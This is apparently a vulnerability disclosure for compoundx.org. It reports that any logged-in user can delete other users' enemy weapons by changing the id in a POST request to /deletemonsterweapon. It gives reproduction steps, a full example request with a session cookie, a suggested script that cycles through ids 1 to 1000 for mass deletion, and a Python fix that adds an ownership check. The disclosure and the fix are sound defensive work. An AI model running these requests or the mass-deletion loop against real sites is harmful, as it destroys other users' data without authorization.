Impact: Any user with a valid session cookie can delete any enemy weapon from the database, regardless of ownership and privacy settings.

Steps to reproduce:

1. Capture the packet sent by clicking the Delete button next to an enemy on the right sidebar (shown below).
2. Change the enemy weapon id (§§ in the example packet) to an arbitrary number, or to a particular one if you happen to have a particular enemy weapon in mind and know its id.
3. Use automation software to submit packets cycling through enemy weapon ids from 1 to 1000 (or however high one prefers) to effect mass deletion.

Example packet (§§ marks the enemy weapon id):

POST /deletemonsterweapon/§§ HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 0
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monsterweapons
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESuGcw.YPWCofLDLiYauvgHjieBj5b7FfE

Recommended fix: Adding permissions that disallow (non-admin) users from deleting enemy weapons they did not create would prevent a bad actor with a single (non-admin) session cookie from deleting enemy weapons owned by other users.
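As an added illustration of the recommended fix (example code, not compoundx.org's own), a framework-agnostic delete handler in the reported shape is shown beside one that enforces the ownership check; the User and MonsterWeapon classes and the in-memory store are assumed stand-ins for the site's session and database.

```python
from dataclasses import dataclass
from typing import Dict, Optional

@dataclass(frozen=True)
class User:
    id: int
    is_admin: bool = False

@dataclass
class MonsterWeapon:
    id: int
    owner_id: int
    name: str

class Forbidden(Exception):
    """No valid session cookie (HTTP 401/403)."""

class NotFound(Exception):
    """Unknown id, or one this user may not act on (HTTP 404)."""

def delete_monster_weapon_vulnerable(store: Dict[int, MonsterWeapon],
                                     current_user: Optional[User],
                                     weapon_id: int) -> MonsterWeapon:
    """Reported behaviour: a session is required, ownership is never checked."""
    if current_user is None:
        raise Forbidden("login required")
    if weapon_id not in store:
        raise NotFound(weapon_id)
    return store.pop(weapon_id)

def delete_monster_weapon_fixed(store: Dict[int, MonsterWeapon],
                                current_user: Optional[User],
                                weapon_id: int) -> MonsterWeapon:
    """Recommended fix: non-admin users may only delete rows they own."""
    if current_user is None:
        raise Forbidden("login required")
    weapon = store.get(weapon_id)
    # A non-owner gets the same 404 as a missing id, so someone cycling
    # through ids cannot tell which ones exist or belong to other users.
    if weapon is None or (not current_user.is_admin and weapon.owner_id != current_user.id):
        raise NotFound(weapon_id)
    del store[weapon_id]
    return weapon

def sample_store() -> Dict[int, MonsterWeapon]:
    """Constructed sample rows (assumed ids and owners), not data from the real site."""
    return {1: MonsterWeapon(1, owner_id=10, name="Rusty Claw"),
            2: MonsterWeapon(2, owner_id=20, name="Venom Fang")}
```

Returning 404 for both unknown and foreign ids also removes the confirmation signal an id-cycling script would otherwise get from a 403.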